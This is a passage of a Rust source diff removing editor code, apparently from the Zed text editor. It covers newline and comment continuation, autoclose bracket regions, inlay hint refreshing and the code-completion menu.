this.trigger_completion_on_input(&text, trigger_in_words, window, cx); - linked_editing_ranges::refresh_linked_ranges(this, window, cx); - this.refresh_inline_completion(true, false, window, cx); - jsx_tag_auto_close::handle_from(this, initial_buffer_versions, window, cx); - }); - } - - fn find_possible_emoji_shortcode_at_position( - snapshot: &MultiBufferSnapshot, - position: Point, - ) -> Option { - let mut chars = Vec::new(); - let mut found_colon = false; - for char in snapshot.reversed_chars_at(position).take(100) { - // Found a possible emoji shortcode in the middle of the buffer - if found_colon { - if char.is_whitespace() { - chars.reverse(); - return Some(chars.iter().collect()); - } - // If the previous character is not a whitespace, we are in the middle of a word - // and we only want to complete the shortcode if the word is made up of other emojis - let mut containing_word = String::new(); - for ch in snapshot - .reversed_chars_at(position) - .skip(chars.len() + 1) - .take(100) - { - if ch.is_whitespace() { - break; - } - containing_word.push(ch); - } - let containing_word = containing_word.chars().rev().collect::(); - if util::word_consists_of_emojis(containing_word.as_str()) { - chars.reverse(); - return Some(chars.iter().collect()); - } - } - - if char.is_whitespace() || !char.is_ascii() { - return None; - } - if char == ':' { - found_colon = true; - } else { - chars.push(char); - } - } - // Found a possible emoji shortcode at the beginning of the buffer - chars.reverse(); - Some(chars.iter().collect()) - } - - pub fn newline(&mut self, _: &Newline, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - let (edits, selection_fixup_info): (Vec<_>, Vec<_>) = { - let selections = this.selections.all::(cx); - let multi_buffer = this.buffer.read(cx); - let buffer = multi_buffer.snapshot(cx); - selections - .iter() - .map(|selection| { - let start_point = 
selection.start.to_point(&buffer); - let mut indent = - buffer.indent_size_for_line(MultiBufferRow(start_point.row)); - indent.len = cmp::min(indent.len, start_point.column); - let start = selection.start; - let end = selection.end; - let selection_is_empty = start == end; - let language_scope = buffer.language_scope_at(start); - let (comment_delimiter, insert_extra_newline) = if let Some(language) = - &language_scope - { - let insert_extra_newline = - insert_extra_newline_brackets(&buffer, start..end, language) - || insert_extra_newline_tree_sitter(&buffer, start..end); - - // Comment extension on newline is allowed only for cursor selections - let comment_delimiter = maybe!({ - if !selection_is_empty { - return None; - } - - if !multi_buffer.language_settings(cx).extend_comment_on_newline { - return None; - } - - let delimiters = language.line_comment_prefixes(); - let max_len_of_delimiter = - delimiters.iter().map(|delimiter| delimiter.len()).max()?; - let (snapshot, range) = - buffer.buffer_line_for_row(MultiBufferRow(start_point.row))?; - - let mut index_of_first_non_whitespace = 0; - let comment_candidate = snapshot - .chars_for_range(range) - .skip_while(|c| { - let should_skip = c.is_whitespace(); - if should_skip { - index_of_first_non_whitespace += 1; - } - should_skip - }) - .take(max_len_of_delimiter) - .collect::(); - let comment_prefix = delimiters.iter().find(|comment_prefix| { - comment_candidate.starts_with(comment_prefix.as_ref()) - })?; - let cursor_is_placed_after_comment_marker = - index_of_first_non_whitespace + comment_prefix.len() - <= start_point.column as usize; - if cursor_is_placed_after_comment_marker { - Some(comment_prefix.clone()) - } else { - None - } - }); - (comment_delimiter, insert_extra_newline) - } else { - (None, false) - }; - - let capacity_for_delimiter = comment_delimiter - .as_deref() - .map(str::len) - .unwrap_or_default(); - let mut new_text = - String::with_capacity(1 + capacity_for_delimiter + indent.len as usize); - 
new_text.push('\n'); - new_text.extend(indent.chars()); - if let Some(delimiter) = &comment_delimiter { - new_text.push_str(delimiter); - } - if insert_extra_newline { - new_text = new_text.repeat(2); - } - - let anchor = buffer.anchor_after(end); - let new_selection = selection.map(|_| anchor); - ( - (start..end, new_text), - (insert_extra_newline, new_selection), - ) - }) - .unzip() - }; - - this.edit_with_autoindent(edits, cx); - let buffer = this.buffer.read(cx).snapshot(cx); - let new_selections = selection_fixup_info - .into_iter() - .map(|(extra_newline_inserted, new_selection)| { - let mut cursor = new_selection.end.to_point(&buffer); - if extra_newline_inserted { - cursor.row -= 1; - cursor.column = buffer.line_len(MultiBufferRow(cursor.row)); - } - new_selection.map(|_| cursor) - }) - .collect(); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections) - }); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn newline_above(&mut self, _: &NewlineAbove, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - - let mut edits = Vec::new(); - let mut rows = Vec::new(); - - for (rows_inserted, selection) in self.selections.all_adjusted(cx).into_iter().enumerate() { - let cursor = selection.head(); - let row = cursor.row; - - let start_of_line = snapshot.clip_point(Point::new(row, 0), Bias::Left); - - let newline = "\n".to_string(); - edits.push((start_of_line..start_of_line, newline)); - - rows.push(row + rows_inserted as u32); - } - - self.transact(window, cx, |editor, window, cx| { - editor.edit(edits, cx); - - editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let mut index = 0; - s.move_cursors_with(|map, _, _| { - let row = rows[index]; - index += 1; - - let point = Point::new(row, 0); - let boundary = map.next_line_boundary(point).1; - let 
clipped = map.clip_point(boundary, Bias::Left); - - (clipped, SelectionGoal::None) - }); - }); - - let mut indent_edits = Vec::new(); - let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); - for row in rows { - let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); - for (row, indent) in indents { - if indent.len == 0 { - continue; - } - - let text = match indent.kind { - IndentKind::Space => " ".repeat(indent.len as usize), - IndentKind::Tab => "\t".repeat(indent.len as usize), - }; - let point = Point::new(row.0, 0); - indent_edits.push((point..point, text)); - } - } - editor.edit(indent_edits, cx); - }); - } - - pub fn newline_below(&mut self, _: &NewlineBelow, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - - let mut edits = Vec::new(); - let mut rows = Vec::new(); - let mut rows_inserted = 0; - - for selection in self.selections.all_adjusted(cx) { - let cursor = selection.head(); - let row = cursor.row; - - let point = Point::new(row + 1, 0); - let start_of_line = snapshot.clip_point(point, Bias::Left); - - let newline = "\n".to_string(); - edits.push((start_of_line..start_of_line, newline)); - - rows_inserted += 1; - rows.push(row + rows_inserted); - } - - self.transact(window, cx, |editor, window, cx| { - editor.edit(edits, cx); - - editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let mut index = 0; - s.move_cursors_with(|map, _, _| { - let row = rows[index]; - index += 1; - - let point = Point::new(row, 0); - let boundary = map.next_line_boundary(point).1; - let clipped = map.clip_point(boundary, Bias::Left); - - (clipped, SelectionGoal::None) - }); - }); - - let mut indent_edits = Vec::new(); - let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); - for row in rows { - let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); - for (row, indent) in 
indents { - if indent.len == 0 { - continue; - } - - let text = match indent.kind { - IndentKind::Space => " ".repeat(indent.len as usize), - IndentKind::Tab => "\t".repeat(indent.len as usize), - }; - let point = Point::new(row.0, 0); - indent_edits.push((point..point, text)); - } - } - editor.edit(indent_edits, cx); - }); - } - - pub fn insert(&mut self, text: &str, window: &mut Window, cx: &mut Context) { - let autoindent = text.is_empty().not().then(|| AutoindentMode::Block { - original_indent_columns: Vec::new(), - }); - self.insert_with_autoindent_mode(text, autoindent, window, cx); - } - - fn insert_with_autoindent_mode( - &mut self, - text: &str, - autoindent_mode: Option, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - - let text: Arc = text.into(); - self.transact(window, cx, |this, window, cx| { - let old_selections = this.selections.all_adjusted(cx); - let selection_anchors = this.buffer.update(cx, |buffer, cx| { - let anchors = { - let snapshot = buffer.read(cx); - old_selections - .iter() - .map(|s| { - let anchor = snapshot.anchor_after(s.head()); - s.map(|_| anchor) - }) - .collect::>() - }; - buffer.edit( - old_selections - .iter() - .map(|s| (s.start..s.end, text.clone())), - autoindent_mode, - cx, - ); - anchors - }); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_anchors(selection_anchors); - }); - - cx.notify(); - }); - } - - fn trigger_completion_on_input( - &mut self, - text: &str, - trigger_in_words: bool, - window: &mut Window, - cx: &mut Context, - ) { - let ignore_completion_provider = self - .context_menu - .borrow() - .as_ref() - .map(|menu| match menu { - CodeContextMenu::Completions(completions_menu) => { - completions_menu.ignore_completion_provider - } - CodeContextMenu::CodeActions(_) => false, - }) - .unwrap_or(false); - - if ignore_completion_provider { - self.show_word_completions(&ShowWordCompletions, window, cx); - } else if 
self.is_completion_trigger(text, trigger_in_words, cx) { - self.show_completions( - &ShowCompletions { - trigger: Some(text.to_owned()).filter(|x| !x.is_empty()), - }, - window, - cx, - ); - } else { - self.hide_context_menu(window, cx); - } - } - - fn is_completion_trigger( - &self, - text: &str, - trigger_in_words: bool, - cx: &mut Context, - ) -> bool { - let position = self.selections.newest_anchor().head(); - let multibuffer = self.buffer.read(cx); - let Some(buffer) = position - .buffer_id - .and_then(|buffer_id| multibuffer.buffer(buffer_id).clone()) - else { - return false; - }; - - if let Some(completion_provider) = &self.completion_provider { - completion_provider.is_completion_trigger( - &buffer, - position.text_anchor, - text, - trigger_in_words, - cx, - ) - } else { - false - } - } - - /// If any empty selections is touching the start of its innermost containing autoclose - /// region, expand it to select the brackets. - fn select_autoclose_pair(&mut self, window: &mut Window, cx: &mut Context) { - let selections = self.selections.all::(cx); - let buffer = self.buffer.read(cx).read(cx); - let new_selections = self - .selections_with_autoclose_regions(selections, &buffer) - .map(|(mut selection, region)| { - if !selection.is_empty() { - return selection; - } - - if let Some(region) = region { - let mut range = region.range.to_offset(&buffer); - if selection.start == range.start && range.start >= region.pair.start.len() { - range.start -= region.pair.start.len(); - if buffer.contains_str_at(range.start, ®ion.pair.start) - && buffer.contains_str_at(range.end, ®ion.pair.end) - { - range.end += region.pair.end.len(); - selection.start = range.start; - selection.end = range.end; - - return selection; - } - } - } - - let always_treat_brackets_as_autoclosed = buffer - .language_settings_at(selection.start, cx) - .always_treat_brackets_as_autoclosed; - - if !always_treat_brackets_as_autoclosed { - return selection; - } - - if let Some(scope) = 
buffer.language_scope_at(selection.start) { - for (pair, enabled) in scope.brackets() { - if !enabled || !pair.close { - continue; - } - - if buffer.contains_str_at(selection.start, &pair.end) { - let pair_start_len = pair.start.len(); - if buffer.contains_str_at( - selection.start.saturating_sub(pair_start_len), - &pair.start, - ) { - selection.start -= pair_start_len; - selection.end += pair.end.len(); - - return selection; - } - } - } - } - - selection - }) - .collect(); - - drop(buffer); - self.change_selections(None, window, cx, |selections| { - selections.select(new_selections) - }); - } - - /// Iterate the given selections, and for each one, find the smallest surrounding - /// autoclose region. This uses the ordering of the selections and the autoclose - /// regions to avoid repeated comparisons. - fn selections_with_autoclose_regions<'a, D: ToOffset + Clone>( - &'a self, - selections: impl IntoIterator>, - buffer: &'a MultiBufferSnapshot, - ) -> impl Iterator, Option<&'a AutocloseRegion>)> { - let mut i = 0; - let mut regions = self.autoclose_regions.as_slice(); - selections.into_iter().map(move |selection| { - let range = selection.start.to_offset(buffer)..selection.end.to_offset(buffer); - - let mut enclosing = None; - while let Some(pair_state) = regions.get(i) { - if pair_state.range.end.to_offset(buffer) < range.start { - regions = ®ions[i + 1..]; - i = 0; - } else if pair_state.range.start.to_offset(buffer) > range.end { - break; - } else { - if pair_state.selection_id == selection.id { - enclosing = Some(pair_state); - } - i += 1; - } - } - - (selection, enclosing) - }) - } - - /// Remove any autoclose regions that no longer contain their selection. 
- fn invalidate_autoclose_regions( - &mut self, - mut selections: &[Selection], - buffer: &MultiBufferSnapshot, - ) { - self.autoclose_regions.retain(|state| { - let mut i = 0; - while let Some(selection) = selections.get(i) { - if selection.end.cmp(&state.range.start, buffer).is_lt() { - selections = &selections[1..]; - continue; - } - if selection.start.cmp(&state.range.end, buffer).is_gt() { - break; - } - if selection.id == state.selection_id { - return true; - } else { - i += 1; - } - } - false - }); - } - - fn completion_query(buffer: &MultiBufferSnapshot, position: impl ToOffset) -> Option { - let offset = position.to_offset(buffer); - let (word_range, kind) = buffer.surrounding_word(offset, true); - if offset > word_range.start && kind == Some(CharKind::Word) { - Some( - buffer - .text_for_range(word_range.start..offset) - .collect::(), - ) - } else { - None - } - } - - pub fn toggle_inline_values( - &mut self, - _: &ToggleInlineValues, - _: &mut Window, - cx: &mut Context, - ) { - self.inline_value_cache.enabled = !self.inline_value_cache.enabled; - - self.refresh_inline_values(cx); - } - - pub fn toggle_inlay_hints( - &mut self, - _: &ToggleInlayHints, - _: &mut Window, - cx: &mut Context, - ) { - self.refresh_inlay_hints( - InlayHintRefreshReason::Toggle(!self.inlay_hints_enabled()), - cx, - ); - } - - pub fn inlay_hints_enabled(&self) -> bool { - self.inlay_hint_cache.enabled - } - - pub fn inline_values_enabled(&self) -> bool { - self.inline_value_cache.enabled - } - - fn refresh_inlay_hints(&mut self, reason: InlayHintRefreshReason, cx: &mut Context) { - if self.semantics_provider.is_none() || !self.mode.is_full() { - return; - } - - let reason_description = reason.description(); - let ignore_debounce = matches!( - reason, - InlayHintRefreshReason::SettingsChange(_) - | InlayHintRefreshReason::Toggle(_) - | InlayHintRefreshReason::ExcerptsRemoved(_) - | InlayHintRefreshReason::ModifiersChanged(_) - ); - let (invalidate_cache, required_languages) = 
match reason { - InlayHintRefreshReason::ModifiersChanged(enabled) => { - match self.inlay_hint_cache.modifiers_override(enabled) { - Some(enabled) => { - if enabled { - (InvalidationStrategy::RefreshRequested, None) - } else { - self.splice_inlays( - &self - .visible_inlay_hints(cx) - .iter() - .map(|inlay| inlay.id) - .collect::>(), - Vec::new(), - cx, - ); - return; - } - } - None => return, - } - } - InlayHintRefreshReason::Toggle(enabled) => { - if self.inlay_hint_cache.toggle(enabled) { - if enabled { - (InvalidationStrategy::RefreshRequested, None) - } else { - self.splice_inlays( - &self - .visible_inlay_hints(cx) - .iter() - .map(|inlay| inlay.id) - .collect::>(), - Vec::new(), - cx, - ); - return; - } - } else { - return; - } - } - InlayHintRefreshReason::SettingsChange(new_settings) => { - match self.inlay_hint_cache.update_settings( - &self.buffer, - new_settings, - self.visible_inlay_hints(cx), - cx, - ) { - ControlFlow::Break(Some(InlaySplice { - to_remove, - to_insert, - })) => { - self.splice_inlays(&to_remove, to_insert, cx); - return; - } - ControlFlow::Break(None) => return, - ControlFlow::Continue(()) => (InvalidationStrategy::RefreshRequested, None), - } - } - InlayHintRefreshReason::ExcerptsRemoved(excerpts_removed) => { - if let Some(InlaySplice { - to_remove, - to_insert, - }) = self.inlay_hint_cache.remove_excerpts(&excerpts_removed) - { - self.splice_inlays(&to_remove, to_insert, cx); - } - self.display_map.update(cx, |display_map, _| { - display_map.remove_inlays_for_excerpts(&excerpts_removed) - }); - return; - } - InlayHintRefreshReason::NewLinesShown => (InvalidationStrategy::None, None), - InlayHintRefreshReason::BufferEdited(buffer_languages) => { - (InvalidationStrategy::BufferEdited, Some(buffer_languages)) - } - InlayHintRefreshReason::RefreshRequested => { - (InvalidationStrategy::RefreshRequested, None) - } - }; - - if let Some(InlaySplice { - to_remove, - to_insert, - }) = self.inlay_hint_cache.spawn_hint_refresh( - 
reason_description, - self.excerpts_for_inlay_hints_query(required_languages.as_ref(), cx), - invalidate_cache, - ignore_debounce, - cx, - ) { - self.splice_inlays(&to_remove, to_insert, cx); - } - } - - fn visible_inlay_hints(&self, cx: &Context) -> Vec { - self.display_map - .read(cx) - .current_inlays() - .filter(move |inlay| matches!(inlay.id, InlayId::Hint(_))) - .cloned() - .collect() - } - - pub fn excerpts_for_inlay_hints_query( - &self, - restrict_to_languages: Option<&HashSet>>, - cx: &mut Context, - ) -> HashMap, clock::Global, Range)> { - let Some(project) = self.project.as_ref() else { - return HashMap::default(); - }; - let project = project.read(cx); - let multi_buffer = self.buffer().read(cx); - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let multi_buffer_visible_start = self - .scroll_manager - .anchor() - .anchor - .to_point(&multi_buffer_snapshot); - let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( - multi_buffer_visible_start - + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), - Bias::Left, - ); - let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; - multi_buffer_snapshot - .range_to_buffer_ranges(multi_buffer_visible_range) - .into_iter() - .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()) - .filter_map(|(buffer, excerpt_visible_range, excerpt_id)| { - let buffer_file = project::File::from_dyn(buffer.file())?; - let buffer_worktree = project.worktree_for_id(buffer_file.worktree_id(cx), cx)?; - let worktree_entry = buffer_worktree - .read(cx) - .entry_for_id(buffer_file.project_entry_id(cx)?)?; - if worktree_entry.is_ignored { - return None; - } - - let language = buffer.language()?; - if let Some(restrict_to_languages) = restrict_to_languages { - if !restrict_to_languages.contains(language) { - return None; - } - } - Some(( - excerpt_id, - ( - multi_buffer.buffer(buffer.remote_id()).unwrap(), - buffer.version().clone(), - 
excerpt_visible_range, - ), - )) - }) - .collect() - } - - pub fn text_layout_details(&self, window: &mut Window) -> TextLayoutDetails { - TextLayoutDetails { - text_system: window.text_system().clone(), - editor_style: self.style.clone().unwrap(), - rem_size: window.rem_size(), - scroll_anchor: self.scroll_manager.anchor(), - visible_rows: self.visible_line_count(), - vertical_scroll_margin: self.scroll_manager.vertical_scroll_margin, - } - } - - pub fn splice_inlays( - &self, - to_remove: &[InlayId], - to_insert: Vec, - cx: &mut Context, - ) { - self.display_map.update(cx, |display_map, cx| { - display_map.splice_inlays(to_remove, to_insert, cx) - }); - cx.notify(); - } - - fn trigger_on_type_formatting( - &self, - input: String, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - if input.len() != 1 { - return None; - } - - let project = self.project.as_ref()?; - let position = self.selections.newest_anchor().head(); - let (buffer, buffer_position) = self - .buffer - .read(cx) - .text_anchor_for_position(position, cx)?; - - let settings = language_settings::language_settings( - buffer - .read(cx) - .language_at(buffer_position) - .map(|l| l.name()), - buffer.read(cx).file(), - cx, - ); - if !settings.use_on_type_format { - return None; - } - - // OnTypeFormatting returns a list of edits, no need to pass them between Zed instances, - // hence we do LSP request & edit on host side only — add formats to host's history. - let push_to_lsp_host_history = true; - // If this is not the host, append its history with new edits. - let push_to_client_history = project.read(cx).is_via_collab(); - - let on_type_formatting = project.update(cx, |project, cx| { - project.on_type_format( - buffer.clone(), - buffer_position, - input, - push_to_lsp_host_history, - cx, - ) - }); - Some(cx.spawn_in(window, async move |editor, cx| { - if let Some(transaction) = on_type_formatting.await? 
{ - if push_to_client_history { - buffer - .update(cx, |buffer, _| { - buffer.push_transaction(transaction, Instant::now()); - buffer.finalize_last_transaction(); - }) - .ok(); - } - editor.update(cx, |editor, cx| { - editor.refresh_document_highlights(cx); - })?; - } - Ok(()) - })) - } - - pub fn show_word_completions( - &mut self, - _: &ShowWordCompletions, - window: &mut Window, - cx: &mut Context, - ) { - self.open_completions_menu(true, None, window, cx); - } - - pub fn show_completions( - &mut self, - options: &ShowCompletions, - window: &mut Window, - cx: &mut Context, - ) { - self.open_completions_menu(false, options.trigger.as_deref(), window, cx); - } - - fn open_completions_menu( - &mut self, - ignore_completion_provider: bool, - trigger: Option<&str>, - window: &mut Window, - cx: &mut Context, - ) { - if self.pending_rename.is_some() { - return; - } - if !self.snippet_stack.is_empty() && self.context_menu.borrow().as_ref().is_some() { - return; - } - - let position = self.selections.newest_anchor().head(); - if position.diff_base_anchor.is_some() { - return; - } - let (buffer, buffer_position) = - if let Some(output) = self.buffer.read(cx).text_anchor_for_position(position, cx) { - output - } else { - return; - }; - let buffer_snapshot = buffer.read(cx).snapshot(); - let show_completion_documentation = buffer_snapshot - .settings_at(buffer_position, cx) - .show_completion_documentation; - - let query = Self::completion_query(&self.buffer.read(cx).read(cx), position); - - let trigger_kind = match trigger { - Some(trigger) if buffer.read(cx).completion_triggers().contains(trigger) => { - CompletionTriggerKind::TRIGGER_CHARACTER - } - _ => CompletionTriggerKind::INVOKED, - }; - let completion_context = CompletionContext { - trigger_character: trigger.and_then(|trigger| { - if trigger_kind == CompletionTriggerKind::TRIGGER_CHARACTER { - Some(String::from(trigger)) - } else { - None - } - }), - trigger_kind, - }; - - let (old_range, word_kind) = 
buffer_snapshot.surrounding_word(buffer_position); - let (old_range, word_to_exclude) = if word_kind == Some(CharKind::Word) { - let word_to_exclude = buffer_snapshot - .text_for_range(old_range.clone()) - .collect::(); - ( - buffer_snapshot.anchor_before(old_range.start) - ..buffer_snapshot.anchor_after(old_range.end), - Some(word_to_exclude), - ) - } else { - (buffer_position..buffer_position, None) - }; - - let completion_settings = language_settings( - buffer_snapshot - .language_at(buffer_position) - .map(|language| language.name()), - buffer_snapshot.file(), - cx, - ) - .completions; - - // The document can be large, so stay in reasonable bounds when searching for words, - // otherwise completion pop-up might be slow to appear. - const WORD_LOOKUP_ROWS: u32 = 5_000; - let buffer_row = text::ToPoint::to_point(&buffer_position, &buffer_snapshot).row; - let min_word_search = buffer_snapshot.clip_point( - Point::new(buffer_row.saturating_sub(WORD_LOOKUP_ROWS), 0), - Bias::Left, - ); - let max_word_search = buffer_snapshot.clip_point( - Point::new(buffer_row + WORD_LOOKUP_ROWS, 0).min(buffer_snapshot.max_point()), - Bias::Right, - ); - let word_search_range = buffer_snapshot.point_to_offset(min_word_search) - ..buffer_snapshot.point_to_offset(max_word_search); - - let provider = self - .completion_provider - .as_ref() - .filter(|_| !ignore_completion_provider); - let skip_digits = query - .as_ref() - .map_or(true, |query| !query.chars().any(|c| c.is_digit(10))); - - let (mut words, provided_completions) = match provider { - Some(provider) => { - let completions = provider.completions( - position.excerpt_id, - &buffer, - buffer_position, - completion_context, - window, - cx, - ); - - let words = match completion_settings.words { - WordsCompletionMode::Disabled => Task::ready(BTreeMap::default()), - WordsCompletionMode::Enabled | WordsCompletionMode::Fallback => cx - .background_spawn(async move { - buffer_snapshot.words_in_range(WordsQuery { - fuzzy_contents: None, 
- range: word_search_range, - skip_digits, - }) - }), - }; - - (words, completions) - } - None => ( - cx.background_spawn(async move { - buffer_snapshot.words_in_range(WordsQuery { - fuzzy_contents: None, - range: word_search_range, - skip_digits, - }) - }), - Task::ready(Ok(None)), - ), - }; - - let sort_completions = provider - .as_ref() - .map_or(false, |provider| provider.sort_completions()); - - let filter_completions = provider - .as_ref() - .map_or(true, |provider| provider.filter_completions()); - - let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; - - let id = post_inc(&mut self.next_completion_id); - let task = cx.spawn_in(window, async move |editor, cx| { - async move { - editor.update(cx, |this, _| { - this.completion_tasks.retain(|(task_id, _)| *task_id >= id); - })?; - - let mut completions = Vec::new(); - if let Some(provided_completions) = provided_completions.await.log_err().flatten() { - completions.extend(provided_completions); - if completion_settings.words == WordsCompletionMode::Fallback { - words = Task::ready(BTreeMap::default()); - } - } - - let mut words = words.await; - if let Some(word_to_exclude) = &word_to_exclude { - words.remove(word_to_exclude); - } - for lsp_completion in &completions { - words.remove(&lsp_completion.new_text); - } - completions.extend(words.into_iter().map(|(word, word_range)| Completion { - replace_range: old_range.clone(), - new_text: word.clone(), - label: CodeLabel::plain(word, None), - icon_path: None, - documentation: None, - source: CompletionSource::BufferWord { - word_range, - resolved: false, - }, - insert_text_mode: Some(InsertTextMode::AS_IS), - confirm: None, - })); - - let menu = if completions.is_empty() { - None - } else { - let mut menu = CompletionsMenu::new( - id, - sort_completions, - show_completion_documentation, - ignore_completion_provider, - position, - buffer.clone(), - completions.into(), - snippet_sort_order, - ); - - menu.filter( - if filter_completions { - 
query.as_deref() - } else { - None - }, - cx.background_executor().clone(), - ) - .await; - - menu.visible().then_some(menu) - }; - - editor.update_in(cx, |editor, window, cx| { - match editor.context_menu.borrow().as_ref() { - None => {} - Some(CodeContextMenu::Completions(prev_menu)) => { - if prev_menu.id > id { - return; - } - } - _ => return, - } - - if editor.focus_handle.is_focused(window) && menu.is_some() { - let mut menu = menu.unwrap(); - menu.resolve_visible_completions(editor.completion_provider.as_deref(), cx); - - *editor.context_menu.borrow_mut() = - Some(CodeContextMenu::Completions(menu)); - - if editor.show_edit_predictions_in_menu() { - editor.update_visible_inline_completion(window, cx); - } else { - editor.discard_inline_completion(false, cx); - } - - cx.notify(); - } else if editor.completion_tasks.len() <= 1 { - // If there are no more completion tasks and the last menu was - // empty, we should hide it. - let was_hidden = editor.hide_context_menu(window, cx).is_none(); - // If it was already hidden and we don't show inline - // completions in the menu, we should also show the - // inline-completion when available. - if was_hidden && editor.show_edit_predictions_in_menu() { - editor.update_visible_inline_completion(window, cx); - } - } - })?; - - anyhow::Ok(()) - } - .log_err() - .await - }); - - self.completion_tasks.push((id, task)); - } - - #[cfg(feature = "test-support")] - pub fn current_completions(&self) -> Option> { - let menu = self.context_menu.borrow(); - if let CodeContextMenu::Completions(menu) = menu.as_ref()? 
{ - let completions = menu.completions.borrow(); - Some(completions.to_vec()) - } else { - None - } - } - - pub fn confirm_completion( - &mut self, - action: &ConfirmCompletion, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) - } - - pub fn confirm_completion_insert( - &mut self, - _: &ConfirmCompletionInsert, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) - } - - pub fn confirm_completion_replace( - &mut self, - _: &ConfirmCompletionReplace, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) - } - - pub fn compose_completion( - &mut self, - action: &ComposeCompletion, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.do_completion(action.item_ix, CompletionIntent::Compose, window, cx) - } - - fn do_completion( - &mut self, - item_ix: Option, - intent: CompletionIntent, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - use language::ToOffset as _; - - let CodeContextMenu::Completions(completions_menu) = self.hide_context_menu(window, cx)? - else { - return None; - }; - - let candidate_id = { - let entries = completions_menu.entries.borrow(); - let mat = entries.get(item_ix.unwrap_or(completions_menu.selected_item))?; - if self.show_edit_predictions_in_menu() { - self.discard_inline_completion(true, cx); - } - mat.candidate_id - }; - - let buffer_handle = completions_menu.buffer; - let completion = completions_menu - .completions - .borrow() - .get(candidate_id)? 
- .clone(); - cx.stop_propagation(); - - let snippet; - let new_text; - if completion.is_snippet() { - snippet = Some(Snippet::parse(&completion.new_text).log_err()?); - new_text = snippet.as_ref().unwrap().text.clone(); - } else { - snippet = None; - new_text = completion.new_text.clone(); - }; - - let replace_range = choose_completion_range(&completion, intent, &buffer_handle, cx); - let buffer = buffer_handle.read(cx); - let snapshot = self.buffer.read(cx).snapshot(cx); - let replace_range_multibuffer = { - let excerpt = snapshot - .excerpt_containing(self.selections.newest_anchor().range()) - .unwrap(); - let multibuffer_anchor = snapshot - .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.start)) - .unwrap() - ..snapshot - .anchor_in_excerpt(excerpt.id(), buffer.anchor_before(replace_range.end)) - .unwrap(); - multibuffer_anchor.start.to_offset(&snapshot) - ..multibuffer_anchor.end.to_offset(&snapshot) - }; - let newest_anchor = self.selections.newest_anchor(); - if newest_anchor.head().buffer_id != Some(buffer.remote_id()) { - return None; - } - - let old_text = buffer - .text_for_range(replace_range.clone()) - .collect::(); - let lookbehind = newest_anchor - .start - .text_anchor - .to_offset(buffer) - .saturating_sub(replace_range.start); - let lookahead = replace_range - .end - .saturating_sub(newest_anchor.end.text_anchor.to_offset(buffer)); - let prefix = &old_text[..old_text.len().saturating_sub(lookahead)]; - let suffix = &old_text[lookbehind.min(old_text.len())..]; - - let selections = self.selections.all::(cx); - let mut ranges = Vec::new(); - let mut linked_edits = HashMap::<_, Vec<_>>::default(); - - for selection in &selections { - let range = if selection.id == newest_anchor.id { - replace_range_multibuffer.clone() - } else { - let mut range = selection.range(); - - // if prefix is present, don't duplicate it - if snapshot.contains_str_at(range.start.saturating_sub(lookbehind), prefix) { - range.start = 
range.start.saturating_sub(lookbehind); - - // if suffix is also present, mimic the newest cursor and replace it - if selection.id != newest_anchor.id - && snapshot.contains_str_at(range.end, suffix) - { - range.end += lookahead; - } - } - range - }; - - ranges.push(range); - - if !self.linked_edit_ranges.is_empty() { - let start_anchor = snapshot.anchor_before(selection.head()); - let end_anchor = snapshot.anchor_after(selection.tail()); - if let Some(ranges) = self - .linked_editing_ranges_for(start_anchor.text_anchor..end_anchor.text_anchor, cx) - { - for (buffer, edits) in ranges { - linked_edits - .entry(buffer.clone()) - .or_default() - .extend(edits.into_iter().map(|range| (range, new_text.to_owned()))); - } - } - } - } - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: None, - text: new_text.clone().into(), - }); - - self.transact(window, cx, |this, window, cx| { - if let Some(mut snippet) = snippet { - snippet.text = new_text.to_string(); - this.insert_snippet(&ranges, snippet, window, cx).log_err(); - } else { - this.buffer.update(cx, |buffer, cx| { - let auto_indent = match completion.insert_text_mode { - Some(InsertTextMode::AS_IS) => None, - _ => this.autoindent_mode.clone(), - }; - let edits = ranges.into_iter().map(|range| (range, new_text.as_str())); - buffer.edit(edits, auto_indent, cx); - }); - } - for (buffer, edits) in linked_edits { - buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(); - let edits = edits - .into_iter() - .map(|(range, text)| { - use text::ToPoint as TP; - let end_point = TP::to_point(&range.end, &snapshot); - let start_point = 